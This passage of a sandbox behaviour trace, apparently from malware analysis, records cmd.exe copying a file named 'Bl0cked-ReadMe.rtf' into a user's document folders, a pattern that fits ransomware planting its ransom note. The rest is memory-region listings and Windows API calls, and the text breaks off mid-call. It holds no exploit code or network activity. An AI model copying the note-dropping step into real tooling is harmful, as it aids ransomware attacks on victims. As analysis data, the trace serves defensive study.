0x409 [0139.609] exit (_Code=0) Process: id = "148" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16980" os_pid = "0xd0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14516 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14517 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14518 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14519 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 14520 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14521 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14522 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14523 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14524 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14525 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15252 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15253 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15254 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15255 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15256 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 15257 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15258 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15259 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15260 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15261 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15262 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15263 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15264 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15265 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15290 start_va = 0x390000 end_va = 0x457fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 15291 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15292 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15293 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15294 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15295 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15296 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 15297 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 15298 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 15299 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Thread: id = 205 os_tid = 0xcf4 [0139.450] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fd7c | out: lpSystemTimeAsFileTime=0x22fd7c*(dwLowDateTime=0x8d0d5960, dwHighDateTime=0x1d440a9)) [0139.450] GetCurrentProcessId () returned 0xd0c [0139.450] GetCurrentThreadId () returned 0xcf4 [0139.450] GetTickCount () returned 0x2bda3 [0139.450] QueryPerformanceCounter (in: lpPerformanceCount=0x22fd74 | out: lpPerformanceCount=0x22fd74*=19623965154) returned 1 [0139.451] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0139.451] __set_app_type (_Type=0x1) [0139.451] __p__fmode () returned 0x76b331f4 [0139.451] __p__commode () returned 0x76b331fc [0139.451] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0139.451] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0139.451] GetCurrentThreadId () returned 0xcf4 [0139.451] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcf4) returned 0x38 [0139.451] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.451] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0139.451] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.462] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.462] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fd0c | out: phkResult=0x22fd0c*=0x0) returned 0x2 [0139.462] VirtualQuery (in: lpAddress=0x22fd43, lpBuffer=0x22fcdc, dwLength=0x1c | out: lpBuffer=0x22fcdc*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fcdc, dwLength=0x1c | out: lpBuffer=0x22fcdc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fcdc, dwLength=0x1c | out: lpBuffer=0x22fcdc*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fcdc, dwLength=0x1c | out: lpBuffer=0x22fcdc*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fcdc, dwLength=0x1c | out: lpBuffer=0x22fcdc*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0139.462] GetConsoleOutputCP () returned 0x1b5 [0139.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.463] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0139.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.463] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0139.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.464] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.465] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.465] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.465] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.465] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.466] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.466] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0139.474] GetEnvironmentStringsW () returned 0x2a01d8* [0139.475] FreeEnvironmentStringsW (penv=0x2a01d8) returned 1 [0139.475] GetEnvironmentStringsW () returned 0x2a01d8* [0139.475] FreeEnvironmentStringsW (penv=0x2a01d8) returned 1 [0139.475] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ec7c | out: phkResult=0x22ec7c*=0x40) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x0, lpData=0x22ec88*=0x0, lpcbData=0x22ec80*=0x1000) returned 0x2 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x1, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x0, lpData=0x22ec88*=0x1, lpcbData=0x22ec80*=0x1000) returned 0x2 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x0, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x40, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x40, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x0, lpData=0x22ec88*=0x40, lpcbData=0x22ec80*=0x1000) returned 0x2 [0139.475] RegCloseKey (hKey=0x40) returned 0x0 [0139.475] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ec7c | out: phkResult=0x22ec7c*=0x40) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x0, lpData=0x22ec88*=0x40, lpcbData=0x22ec80*=0x1000) returned 0x2 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x1, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x0, lpData=0x22ec88*=0x1, lpcbData=0x22ec80*=0x1000) returned 0x2 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x0, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x9, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x9, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x0, lpData=0x22ec88*=0x9, lpcbData=0x22ec80*=0x1000) returned 0x2 [0139.475] RegCloseKey (hKey=0x40) returned 0x0 [0139.476] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0139.476] srand (_Seed=0x5b88636e) [0139.476] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0139.476] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0139.476] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.476] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a1938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0139.476] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0139.476] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.476] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.476] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.476] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0139.476] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.476] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.476] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.476] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.476] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.476] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0139.476] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0139.476] GetEnvironmentStringsW () returned 0x2a2328* [0139.477] FreeEnvironmentStringsW (penv=0x2a2328) returned 1 [0139.477] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.477] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.477] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.477] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.477] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.477] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.477] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.477] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.477] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0139.477] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.477] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fa48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.477] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22fa48, lpFilePart=0x22fa44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22fa44*="Desktop") returned 0x18 [0139.477] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.477] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f7c4 | out: lpFindFileData=0x22f7c4) returned 0x2a0068 [0139.477] FindClose (in: hFindFile=0x2a0068 | out: hFindFile=0x2a0068) returned 1 [0139.477] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f7c4 | out: lpFindFileData=0x22f7c4) returned 0x2a0068 [0139.477] FindClose (in: hFindFile=0x2a0068 | out: hFindFile=0x2a0068) returned 1 [0139.477] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f7c4 | out: lpFindFileData=0x22f7c4) returned 0x2a0068 [0139.477] FindClose (in: hFindFile=0x2a0068 | out: hFindFile=0x2a0068) returned 1 [0139.478] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.478] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0139.478] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0139.478] GetEnvironmentStringsW () returned 0x2a2b48* [0139.478] FreeEnvironmentStringsW (penv=0x2a2b48) returned 1 [0139.478] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.478] GetConsoleOutputCP () returned 0x1b5 [0139.485] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.485] GetUserDefaultLCID () returned 0x409 [0139.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0139.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fb88, cchData=128 | out: lpLCData="0") returned 2 [0139.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fb88, cchData=128 | out: lpLCData="0") returned 2 [0139.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fb88, cchData=128 | out: lpLCData="1") returned 2 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0139.492] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0139.492] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.493] GetConsoleTitleW (in: lpConsoleTitle=0x290918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.498] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.498] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0139.498] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0139.498] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0139.499] _wcsicmp (_String1="type", _String2=")") returned 75 [0139.499] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0139.499] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0139.499] _wcsicmp (_String1="IF", _String2="type") returned -11 [0139.499] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0139.499] _wcsicmp (_String1="REM", _String2="type") returned -2 [0139.499] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0139.503] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.503] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.503] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.503] GetFileType (hFile=0x7) returned 0x2 [0139.521] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0139.521] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22fa80 | out: lpMode=0x22fa80) returned 1 [0139.521] _dup (_FileHandle=1) returned 3 [0139.522] _close (_FileHandle=1) returned 0 [0139.538] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0139.538] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22fa50, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0139.538] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0139.538] GetConsoleTitleW (in: lpConsoleTitle=0x22f880, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.538] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0139.538] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0139.538] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0139.538] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0139.539] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.539] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x22f3e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f3e4) returned 0x290ee0 [0139.539] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0139.539] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0139.540] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0139.540] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22e2f0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0139.540] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0139.540] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.540] GetFileType (hFile=0x54) returned 0x1 [0139.540] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.540] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x22e348 | out: lpFileSizeHigh=0x22e348*=0x0) returned 0x1632 [0139.540] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.540] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.540] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.540] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, 